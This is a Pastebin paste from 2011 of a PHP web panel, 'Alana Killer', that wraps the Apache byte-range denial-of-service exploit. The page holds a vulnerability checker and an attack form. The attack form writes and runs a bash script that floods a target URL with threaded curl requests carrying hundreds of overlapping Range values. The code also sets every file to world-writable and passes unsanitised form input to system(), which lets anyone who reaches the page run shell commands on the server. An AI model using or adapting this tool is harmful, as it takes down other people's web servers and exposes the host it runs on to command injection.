Advertisement
Guest User

[4L4N4 K!LL3R by S4(uR4] top priv8 agressive apache killer e

a guest
Oct 1st, 2011
6,929
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.01 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4.  
  5.     Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
  6.     k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
  7.     S4(uR4, r00tw0rm __2011__
  8.     w4tch u. h4ck u. fuck u.
  9.     Pr!v8 2 Publ!c
  10. */
  11.  
  12. error_reporting(0);
  13. `chmod -R 777 *`;
  14.  
  15. ?>
  16.  
  17. <html><head><title>~=4L4N4 K!LL3R by S4(uR4=~</title>
  18. <meta charset='utf-8'>
  19. </head><body bgcolor = "black">
  20. <font color='#969696'>
  21. <pre>
  22. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  23. 0             __      __   __                   __                           1
  24. 1           /'__`\  /'__`\/\ \__              /'__`\                         0
  25. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
  26. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
  27. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
  28. 1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
  29. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  30. 1                                                                            0
  31. 0                                                                            1
  32. 1              <font color="red">                         >> 4L4N4 K!LL3R</font>                      0
  33. 0                                       >> author : S4(uR4                   1
  34. 1                                       >> sanjar[at]xakep[dot]ru            0
  35. 0                                       >> Priv8 v.0.1                       1
  36. 1                                       >> )c(  2011                         0
  37. 0                                                                            1
  38. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  39. </pre></font>
  40.  
  41. <h3><font color='555555'>[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::</font></h3>
  42. <form action="index.php" method="POST">
  43. <font color="hack">TESTED URL : </font><input type="text" name="test_url"><br>
  44. <input type=submit value="Ch3ck 1t!">
  45. </form>
  46. <font color='red'>
  47. <?php
  48.  
  49. echo "<br></pre>";
  50.        //if(!empty($_POST[0])){
  51.        echo "<br><font color='hack'>"."[+] Server Test Running : <pre>";
  52.        echo "<br>";
  53.        system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
  54.        echo "</pre>";
  55.  
  56. ?>
  57.  
  58. <h3><font color='555555'>[ATACK] ::</font></h3>
  59. <form action="index.php" method="POST">
  60. <font color='hack'>REQUEST : </font> <input type=text name="request"><br>
  61. <font color='hack'>THREADS : </font> <input type="text" name="threads"><br>
  62. <font color="hack">URL     : </font><input type="text" name="url"><br>
  63. <input type=submit value="Fuck UP!">
  64. </form>
  65.  
  66. <h3><font color='555555'>[LOG] ::</font></h3>
  67.  
  68. <?php
  69.  
  70. echo "<font color='555555'>PWD :: ".`pwd`;
  71. echo "<br>SYSTEM :: ".`uname -a`;
  72. echo "<br>ID :: ".`id`;
  73. echo "<br>DATE :: ".`date`."</font><br>";
  74.  
  75.  
  76. $tmp1 = "alana_kill3r.sh";
  77. `touch alana_kill3r.sh`;
  78. $apache_killer = <<<XPLOIT
  79. #!/bin/bash
  80. test "$1" == "" && echo $0 requests threads target-url && exit 0
  81. seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
  82. -H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
  83. --compress -s $3 | grep HTTP
  84. XPLOIT;
  85.  
  86. if (is_writable($tmp1)) {
  87.     if (!$handle = fopen($tmp1, 'w+')) {
  88.          echo "<font color='red'>[x] Can't open file ($tmp1)</font>";
  89.          exit;
  90.     }
  91.     if (fwrite($handle, $apache_killer) === FALSE) {
  92.         echo "<font color='red'>[x] Can't write file ($tmp1)</font>";
  93.         exit;
  94.     }
  95.     echo "<br><font color='hack'>"."[+] ALL OK, xpl0it Writed</font>";
  96.     fclose($handle);
  97. } else {
  98.     echo "<br><font color='red'>[x] File $tmp1 has not access to write</font>";
  99. }
  100.  
  101. ?>
  102.  
  103.  
  104.  
  105.  
  106. <?php
  107. echo"<br><pre>";
  108. $pwd = "-al";
  109. system("ls ".$pwd);
  110. echo "<br></pre>";
  111.        echo "<br><font color='hack'>"."[+] Xploit Started with : <pre>";
  112.        `chmod +x`.$tmp1;
  113.        echo "<br>root@r00tw0rm:$ ";
  114.        system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
  115.        echo "</pre>";
  116. ?>
  117.  
  118.  
  119. </font>
  120. </body></html>
  121.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement